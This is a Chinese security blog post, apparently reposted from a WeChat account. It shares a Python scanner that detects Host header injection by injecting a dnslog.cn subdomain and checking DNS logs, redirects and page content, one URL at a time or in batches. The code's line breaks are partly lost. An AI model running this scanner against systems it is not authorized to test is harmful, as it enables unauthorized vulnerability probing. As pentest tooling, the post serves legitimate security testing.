安服仔小工具-Host注入

admin
admin
admin
138635
文章
114
评论
2022年3月8日14:33:54评论135 views字数 3602阅读12分0秒阅读模式

安服仔小工具-Host注入


△△△点击上方“蓝字”关注我们了解更多精彩




0x00 Preface [前言/简介]

    首先菜鸟本菜声明!求大佬带我写工具!!!
    写这个脚本的起因挺有意思的大佬A在问Host注入的问题!大佬B友善回答!然后莫名其妙的就有大佬N叫我去写这个脚本,于是本菜鸟就很欣然的开写!
    代码写的不好 请多指教!


0x01 Host注入检测脚本的工作过程

  1. 漏洞检测

    场景一:正常请求修改host参数,响应302,Location首部字段指明跳转的地址,其中Location字段值为Host字段指定的地址。

    场景二:正常请求修改host参数,正常响应,将Host字段值拼接到标签属性值中

    场景三:正常请求修改host参数,只不过修改的参数改成了dnslog这类地址来探查无法从响应头跟标签属性中来判断漏洞的方法。

    Ps:参考文章我放我了文章末尾了!

  2. 脚本工作导图

安服仔小工具-Host注入





0x02 脚本代码及注释
#!/usr/bin/env python3# -*- coding: utf-8 -*-# @File : Host_into.py# @Author : Parchment# @Time : 2021/5/19 10:32# @Software: PyCharm
import requestsimport sysimport reimport csv
listsall = []   # 用于存储数据的总列表

def scan(url):    dns_url = "http://www.dnslog.cn/"       # dnslog地址    urlget = "http://www.dnslog.cn/getdomain.php"       # dnslog获取子域名链接    urlrender = "http://www.dnslog.cn//getrecords.php"  # dnslog获取子域名访问日志链接    conn1 = requests.session()          # 做一个会话保持    conn1.get(url=dns_url)      # 发起dnslog的首页请求    lisss = []      # 用于存储数据的列表    requests.packages.urllib3.disable_warnings()  # 禁用安全请求警告    payload = conn1.get(url=urlget).text    # 发起dnslog获取子域名的请求并取出子域名 作为payload    print("获取到的dnslog子域名:" + payload)    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0',               'host': payload}     # 设定目标站的 host 值    res = re.search('http', url)      # 判断 url 是否存在http    if res is None:     # 如果变量 res 为 None 那么进行拼接 http:// 或 http:// 并发起请求        try:    # 当http访问发生错误时 将进行https访问            urls = "http://"+url            print(urls)            r = requests.get(url=urls, headers=headers,                             timeout=8, allow_redirects=False, verify=False)        except Exception as e:            urls = "https://" + url            print(urls)            try:                r = requests.get(url=urls, headers=headers,                                 timeout=8, allow_redirects=False, verify=False)            except Exception as err:                print(err)    else:       # 否则正常发起请求        try:            r = requests.get(url=url, headers=headers, timeout=8, allow_redirects=False, verify=False)        except Exception as err:            print(err)    try:        code = r.status_code        # 获取目标站点的状态码        dlog = conn1.get(url=urlrender, timeout=8).text   # 获取dnslog得到的访问日志列表        if payload in dlog:         # 判断是否为空 不为空即可证实存在Host注入            print("dnslog" + dlog)            print("dnslog验证存在")            lisss.append(url)            lisss.append("dnslog验证存在")            listsall.append(lisss)        elif code == 200:       # 根据状态码进行判断 状态码为200时            text = r.text            if payload in text:         # 判断返回的文本中是否存在 payload 字段                lisss.append(url)                lisss.append('html验证存在')                listsall.append(lisss)                print("html验证存在")            else:                print("不存在")            print("dnslog"+conn1.get(url=urlrender, timeout=8).text)        elif code == 302:   # 状态码为302时            locations = r.headers['Location']            if payload in locations:        # 判断返回包中的Location是否存在 payload 字段                lisss.append(url)                lisss.append('302返回包验证存在')                listsall.append(lisss)                print("返回包验证存在")            else:                print("不存在")        else:            print("不存在")    except Exception as err:        pass    return listsall

def start(argv):    try:        if argv[1] == "-i":            u = argv[2]  # 获取URL            scan(u)            print("-==============================")        elif argv[1] == "-r":            with open(argv[2], 'r') as f:                ff = f.read()                lists = ff.split('n')                for u in lists:                    print(u)                    scan(u)                    print("-==============================")        elif argv[1] == "-h":            print('''            python3 Host_into.py -h                    #帮助            python3 Host_into.py -i 
              #单个url扫描            python3 Host_into.py -r [绝对路径txt]      #批量url扫描                                               ''')        try:            with open("./Host_into.csv", "w", newline='') as csvfile:  # 打开一个.csv文件 没有 就创建一个                writer = csv.writer(csvfile)                writer.writerow(["url", "判断方法"])  # 先写入columns_name                writer.writerows(listsall)  # 写入多行用writerows            print("所有内容已保存至当前目录内:命名为Host_into.csv")        except Exception as err:            pass    except Exception as err:        pass

if __name__ == "__main__":    try:        start(sys.argv[0:])    except KeyboardInterrupt:        print("interrupted by user, killing all threads...")




0x03 运行结果

安服仔小工具-Host注入

安服仔小工具-Host注入




0x04 脚本使用命令
python3 Host_into.py -h                    #帮助python3 Host_into.py -i 
              #单个url扫描python3 Host_into.py -r [绝对路径txt]        #批量url扫描




0x09 Summary 总结
砥砺前行,希望这个小脚本能对大家有点帮助。
另外,如果脚本可能并不是很完善,大佬们要是看出了什么问题欢迎联系,也欢迎提供建议。

附带Host注入参考文章:

https://blog.csdn.net/madao1o_o/article/details/107507344https://blog.csdn.net/weixin_39609500/article/details/111349436



END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

安服仔小工具-Host注入

或添加NOVASEC-MOYU 以便于及时回复。

安服仔小工具-Host注入


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):安服仔小工具-Host注入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月8日14:33:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安服仔小工具-Host注入https://cn-sec.com/archives/494275.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息